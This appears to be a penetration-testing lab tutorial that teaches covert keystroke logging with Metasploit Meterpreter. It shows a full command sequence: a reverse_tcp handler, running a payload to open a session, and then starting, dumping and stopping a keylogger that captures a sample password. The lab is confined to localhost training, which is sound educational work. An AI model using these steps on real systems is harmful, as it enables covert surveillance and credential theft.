Log Keystrokes on a Target using Meterpreter

RedisBeginner
Practice Now

Introduction

In this lab, you will explore a common post-exploitation technique: keystroke logging. Keystroke logging, or "keylogging," is the process of recording the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. In penetration testing, this technique is invaluable for gathering sensitive information such as usernames, passwords, and other confidential data.

We will use Metasploit Framework's powerful payload, Meterpreter, to accomplish this. Meterpreter has a built-in module called keyscan that allows an attacker to easily start, dump, and stop a keylogger on a compromised system. Throughout this lab, you will learn how to gain a Meterpreter session, deploy the keylogger, capture keystrokes, and then clean up your tracks.

Gain a Meterpreter session on a target

In this step, we will set up a listener in Metasploit and execute a payload to gain a Meterpreter session. For the purpose of this lab, we will act as both the attacker and the target on the same machine. A payload file named payload.elf has already been created for you in the ~/project directory.

First, let's start the Metasploit Framework console.

msfconsole -q

Once msfconsole is loaded, we need to set up a handler to listen for the incoming connection from our payload.

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job using the -j flag.

exploit -j

You should see that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, open a new terminal tab by clicking the + icon in the terminal panel. In this new tab, execute the payload.

./payload.elf

Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400

To interact with this new session, use the sessions command.

sessions -i 1

Your prompt should change to meterpreter>, indicating you are now in control of the target session.

[*] Starting interaction with 1...

meterpreter >

Start the keystroke logger with the keyscan_start command

In this step, with an active Meterpreter session, we will start the keystroke logger on the target machine. The command for this is keyscan_start. This command injects a keylogger into a process on the target system and begins capturing all keyboard input.

Ensure you are at the meterpreter> prompt. Type the following command and press Enter:

keyscan_start

The system will confirm that the keylogger has been initiated.

Starting the keystroke sniffer...

The logger is now running silently in the background on the target system, recording every key that is pressed.

Wait for the user to type information

In this step, we will simulate a user typing sensitive information on the target machine. Since our keylogger is active, it will capture this activity.

Open a new terminal tab again by clicking the + icon. In this new terminal, we will simulate a user typing a password. You can type any command, but for this example, we'll use echo to simulate typing a secret password.

echo "MySuperSecretPassword123"

After running the command, you can close this new terminal tab. The keystrokes for echo "MySuperSecretPassword123" have now been captured by our running keylogger. Return to the terminal tab where your Meterpreter session is active.

Dump the captured keystrokes with the keyscan_dump command

In this step, we will retrieve the keystrokes that have been captured by the logger. The keyscan_dump command fetches all the recorded keystrokes from the target machine and displays them in your Meterpreter console.

At the meterpreter> prompt, execute the following command:

keyscan_dump

You will see the output of all the keystrokes captured since the logger was started. This will include the command you typed in the previous step.

Dumping captured keystrokes...

echo "MySuperSecretPassword123"

As you can see, the command we typed in the other terminal has been successfully captured. This demonstrates how an attacker can steal credentials, commands, and other sensitive text typed by a user.

Stop the keystroke logger with keyscan_stop

In this step, we will stop the keylogger. It is crucial for a penetration tester to clean up after an engagement to remove any artifacts and stop any running processes, leaving the target system as it was found.

To stop the keylogger, use the keyscan_stop command in your Meterpreter session.

keyscan_stop

The system will confirm that the keylogger has been stopped.

Stopping the keystroke sniffer...

The keylogger is no longer active on the target machine. You can now safely exit the Meterpreter session and msfconsole by typing exit twice.

Summary

In this lab, you have successfully learned how to perform keystroke logging on a target system using Meterpreter. You practiced the entire lifecycle of this post-exploitation technique, from gaining a session to cleaning up your tools.

You learned how to:

  • Establish a Meterpreter session using a handler and a payload.
  • Start the keylogger on a target using the keyscan_start command.
  • Dump the captured keystrokes to view sensitive information with keyscan_dump.
  • Stop the keylogger and clean up the session using keyscan_stop.

This is a powerful technique that highlights the importance of system security and monitoring. Remember to use these skills responsibly and ethically. Congratulations on completing the lab!